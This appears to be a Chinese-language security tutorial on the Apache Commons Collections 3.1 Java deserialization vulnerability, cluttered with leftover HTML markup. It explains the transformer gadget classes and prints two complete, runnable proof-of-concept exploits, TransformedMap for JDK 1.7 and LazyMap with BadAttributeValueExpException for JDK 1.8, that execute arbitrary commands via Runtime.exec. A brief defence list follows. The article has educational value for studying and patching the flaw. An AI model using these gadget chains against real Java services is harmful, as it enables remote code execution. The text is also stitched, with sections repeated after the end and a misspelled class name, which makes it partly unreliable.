Apache Commons Collections Java反序列化漏洞深入分析<\/h1>

前言<\/h2>
Apache Commons Collections 3.1的反序列化漏洞是Java历史上最著名且最具代表性的反序列化漏洞。本文将详细分析该漏洞的原理、利用方式及防御措施。<\/p>

环境准备<\/h2>

JDK 1.7版本<\/li>
IntelliJ IDEA<\/li>

commons-collections-3.1.jar<\/li> <\/ul>

基础知识<\/h2>

Java反射机制<\/h3>
反射是在运行时获取类的完整构造并调用对应方法的能力，在漏洞利用中起关键作用。<\/p>

核心反射类<\/h4>

java.lang.Class<\/code><\/li>
java.lang.reflect.Constructor<\/code><\/li>
java.lang.reflect.Field<\/code><\/li>
java.lang.reflect.Method<\/code><\/li>

java.lang.reflect.Modifier<\/code><\/li>
<\/ul>
获取Class对象的三种方式<\/h4>
\/\/ 1. Class.forName静态方法
<\/span><\/span><\/span><\/span>Class clz =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.String"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 使用.class方法
<\/span><\/span><\/span><\/span>Class clz =<\/span> String.<\/span>class<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 使用对象的getClass()方法
<\/span><\/span><\/span><\/span>String str =<\/span> new<\/span> String(<\/span>"Hello"<\/span>);<\/span>
<\/span><\/span>Class clz =<\/span> str.<\/span>getClass<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>反射执行命令示例<\/h4>
\/\/ 获取Runtime类对象
<\/span><\/span><\/span><\/span>Class runtimeClass1 =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取构造方法并创建实例
<\/span><\/span><\/span><\/span>Constructor constructor =<\/span> runtimeClass1.<\/span>getDeclaredConstructor<\/span>();<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object runtimeInstance =<\/span> constructor.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取exec方法并执行
<\/span><\/span><\/span><\/span>Method runtimeMethod =<\/span> runtimeClass1.<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>Process process =<\/span> (<\/span>Process)<\/span> runtimeMethod.<\/span>invoke<\/span>(<\/span>runtimeInstance,<\/span> cmd);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取执行结果
<\/span><\/span><\/span><\/span>InputStream in =<\/span> process.<\/span>getInputStream<\/span>();<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>IOUtils.<\/span>toString<\/span>(<\/span>in,<\/span> "UTF-8"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>Java反序列化<\/h3>
Java中可以通过重写以下方法实现自定义序列化\/反序列化：<\/p>

private void writeObject(ObjectOutputStream oos)<\/code><\/li>
private void readObject(ObjectInputStream ois)<\/code><\/li>
private void readObjectNoData()<\/code><\/li>
protected Object writeReplace()<\/code><\/li>
protected Object readResolve()<\/code><\/li>
<\/ul>
反序列化时会自动调用readObject<\/code>方法。<\/p>
漏洞原理分析<\/h2>
CC链反序列化漏洞的利用思路：<\/p>

利用InvokerTransformer<\/code>、ConstantTransformer<\/code>、ChainedTransformer<\/code>等类构建反射链<\/li>
寻找Commons Collections中会在反序列化时触发transform<\/code>方法的类<\/li>
<\/ol>
一、构建反射链<\/h3>
InvokerTransformer类分析<\/h4>
InvokerTransformer.transform()<\/code>方法实现了反射调用：<\/p>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span>
<\/span><\/span>        return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (...)<\/span> {<\/span>
<\/span><\/span>        \/\/ 异常处理
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>通过控制iMethodName<\/code>、iParamTypes<\/code>和iArgs<\/code>参数，可以实现任意方法调用。<\/p>
ChainedTransformer类分析<\/h4>
ChainedTransformer<\/code>实现了链式调用：<\/p>
public<\/span> Object transform<\/span>(<\/span>Object object)<\/span> {<\/span>
<\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> iTransformers.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span>
<\/span><\/span>        object =<\/span> iTransformers[<\/span>i].<\/span>transform<\/span>(<\/span>object);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> object;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>ConstantTransformer类分析<\/h4>
简单的值转换器，用于提供初始对象。<\/p>
完整反射链POC<\/h4>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]<\/span> {<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]<\/span> {<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span>
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span>},<\/span>
<\/span><\/span>        new<\/span> Object[]<\/span> {<\/span>"open -a Calculator"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span><\/code><\/pre>二、寻找触发链<\/h3>
我们需要找到一个类：<\/p>

重写了readObject<\/code>方法<\/li>
在反序列化过程中会调用transform<\/code>方法<\/li>
<\/ol>
JDK 1.7 - TransformedMap利用链<\/h4>
调用链：<\/p>
ObjectInputStream.readObject()
→ AnnotationInvocationHandler.readObject()
→ TransformedMap.entrySet().iterator().next().setValue()
→ TransformedMap.checkSetValue()
→ TransformedMap.transform()
→ ChainedTransformer.transform()
<\/code><\/pre>
关键点分析<\/strong>：<\/p>

TransformedMap<\/code>构造函数：<\/li>
<\/ol>
protected<\/span> TransformedMap<\/span>(<\/span>Map map,<\/span> Transformer keyTransformer,<\/span> Transformer valueTransformer)<\/span> {<\/span>
<\/span><\/span>    super<\/span>(<\/span>map);<\/span>
<\/span><\/span>    this<\/span>.<\/span>keyTransformer<\/span> =<\/span> keyTransformer;<\/span>
<\/span><\/span>    this<\/span>.<\/span>valueTransformer<\/span> =<\/span> valueTransformer;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
put<\/code>方法触发transformValue<\/code>：<\/li>
<\/ol>
public<\/span> Object put<\/span>(<\/span>Object key,<\/span> Object value)<\/span> {<\/span>
<\/span><\/span>    key =<\/span> this<\/span>.<\/span>transformKey<\/span>(<\/span>key);<\/span>
<\/span><\/span>    value =<\/span> this<\/span>.<\/span>transformValue<\/span>(<\/span>value);<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>getMap<\/span>().<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
AnnotationInvocationHandler.readObject<\/code>中会调用setValue<\/code><\/li>
<\/ol>
完整POC<\/strong>：<\/p>
public<\/span> class<\/span> Exec<\/span> implements<\/span> Serializable {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>        Map map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "sijidou"<\/span>);<\/span>
<\/span><\/span>        Map transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> transformerChain);<\/span>
<\/span><\/span>
<\/span><\/span>        Class cl =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor ctor =<\/span> cl.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        ctor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object instance =<\/span> ctor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedMap);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 序列化和反序列化
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream bos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>bos);<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>instance);<\/span>
<\/span><\/span>        oos.<\/span>close<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>bos.<\/span>toByteArray<\/span>()));<\/span>
<\/span><\/span>        ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>JDK 1.8 - LazyMap利用链<\/h4>
由于JDK 1.8中AnnotationInvocationHandler<\/code>的变化，需要使用新的触发链：<\/p>
调用链：<\/p>
反序列化BadAttributeValueExpException
→ BadAttributeValueExpException.readObject()
→ TideMapEntry.toString()
→ TideMapEntry.getValue()
→ LazyMap.get()
→ ChainedTransformer.transform()
<\/code><\/pre>
关键点分析<\/strong>：<\/p>

LazyMap.get<\/code>方法：<\/li>
<\/ol>
public<\/span> Object get<\/span>(<\/span>Object key)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (!<\/span>this<\/span>.<\/span>map<\/span>.<\/span>containsKey<\/span>(<\/span>key))<\/span> {<\/span>
<\/span><\/span>        Object value =<\/span> this<\/span>.<\/span>factory<\/span>.<\/span>transform<\/span>(<\/span>key);<\/span>
<\/span><\/span>        this<\/span>.<\/span>map<\/span>.<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span>
<\/span><\/span>        return<\/span> value;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>map<\/span>.<\/span>get<\/span>(<\/span>key);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
TiedMapEntry<\/code>类：<\/li>
<\/ol>
public<\/span> Object getValue<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>map<\/span>.<\/span>get<\/span>(<\/span>this<\/span>.<\/span>key<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> String toString<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> getKey()<\/span> +<\/span> "="<\/span> +<\/span> getValue();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
BadAttributeValueExpException.readObject<\/code>会调用toString<\/code><\/li>
<\/ol>
完整POC<\/strong>：<\/p>
public<\/span> class<\/span> Exec<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> BadAttributeValueExpException getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        final<\/span> String[]<\/span> execArgs =<\/span> new<\/span> String[]<\/span> {<\/span> command };<\/span>
<\/span><\/span>        final<\/span> Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span> new<\/span> ConstantTransformer(<\/span>1<\/span>)<\/span> });<\/span>
<\/span><\/span>        
<\/span><\/span>        final<\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]<\/span> {<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]<\/span> {<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]<\/span> {<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span>
<\/span><\/span>                new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span>},<\/span> execArgs),<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>1<\/span>)<\/span> };<\/span>
<\/span><\/span>
<\/span><\/span>        final<\/span> Map innerMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        final<\/span> Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> transformerChain);<\/span>
<\/span><\/span>        TiedMapEntry entry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "foo"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>        BadAttributeValueExpException val =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>        Field valfield =<\/span> val.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>        valfield.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        valfield.<\/span>set<\/span>(<\/span>val,<\/span> entry);<\/span>
<\/span><\/span>        
<\/span><\/span>        Field iTransformers =<\/span> transformerChain.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"iTransformers"<\/span>);<\/span>
<\/span><\/span>        iTransformers.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        iTransformers.<\/span>set<\/span>(<\/span>transformerChain,<\/span> transformers);<\/span>
<\/span><\/span>
<\/span><\/span>        return<\/span> val;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        BadAttributeValueExpException calc =<\/span> getObject(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化和反序列化
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream bos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>bos);<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>calc);<\/span>
<\/span><\/span>        oos.<\/span>close<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>bos.<\/span>toByteArray<\/span>()));<\/span>
<\/span><\/span>        ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级Apache Commons Collections到安全版本(3.2.2+)<\/li>
使用JVM安全管理器限制反序列化<\/li>
使用白名单机制控制可反序列化的类<\/li>
使用ObjectInputFilter<\/code>过滤反序列化输入<\/li>
<\/ol>
参考资源<\/h2>

Java反序列化漏洞原理分析<\/a><\/li>
Apache Commons Collections反序列化漏洞详解<\/a><\/li>
腾讯安全应急响应中心分析<\/a><\/li>
<\/ul>

Apache Commons Collections Java反序列化漏洞深入分析<\/h1>

前言<\/h2> Apache Commons Collections 3.1的反序列化漏洞是Java历史上最著名且最具代表性的反序列化漏洞。本文将详细分析该漏洞的原理、利用方式及防御措施。<\/p>

基础知识<\/h2>

Java反射机制<\/h3> 反射是在运行时获取类的完整构造并调用对应方法的能力，在漏洞利用中起关键作用。<\/p>

一、构建反射链<\/h3>

ConstantTransformer类分析<\/h4> 简单的值转换器，用于提供初始对象。<\/p>

参考资源<\/h2> Java反序列化漏洞原理分析<\/a><\/li> Apache Commons Collections反序列化漏洞详解<\/a><\/li> 腾讯安全应急响应中心分析<\/a><\/li> <\/ul>

前言<\/h2>
Apache Commons Collections 3.1的反序列化漏洞是Java历史上最著名且最具代表性的反序列化漏洞。本文将详细分析该漏洞的原理、利用方式及防御措施。<\/p>

Java反射机制<\/h3>
反射是在运行时获取类的完整构造并调用对应方法的能力，在漏洞利用中起关键作用。<\/p>

ConstantTransformer类分析<\/h4>
简单的值转换器，用于提供初始对象。<\/p>

参考资源<\/h2>

Java反序列化漏洞原理分析<\/a><\/li>
Apache Commons Collections反序列化漏洞详解<\/a><\/li>
腾讯安全应急响应中心分析<\/a><\/li> <\/ul>